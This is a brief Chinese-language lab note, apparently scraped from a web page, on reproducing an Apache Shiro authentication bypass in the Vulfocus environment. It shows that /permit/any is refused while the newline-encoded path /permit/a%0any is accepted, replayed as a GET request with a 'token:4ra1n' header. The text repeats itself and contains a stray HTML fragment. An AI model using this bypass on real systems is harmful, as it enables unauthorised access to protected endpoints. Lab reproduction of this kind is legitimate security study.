Apache Shiro 身份认证绕过漏洞访问/permit/any,返回拒绝访问访问/permit/a%0any利用/permit/any + token:4ra1n以 GET 请求重放攻击复现https://vulfocus.cn/#/dashboard">使用https://vulfocus.cn/#/dashboard/permit/any/permit/a%0any/permit/any + token:4ra1n Apache Shiro 身份认证绕过漏洞 访问/permit/any,返回拒绝访问 访问/permit/a%0any 利用/permit/any + token:4ra1n以 GET 请求重放攻击 复现 使用https://vulfocus.cn/#/dashboard /permit/any /permit/a%0any /permit/any + token:4ra1n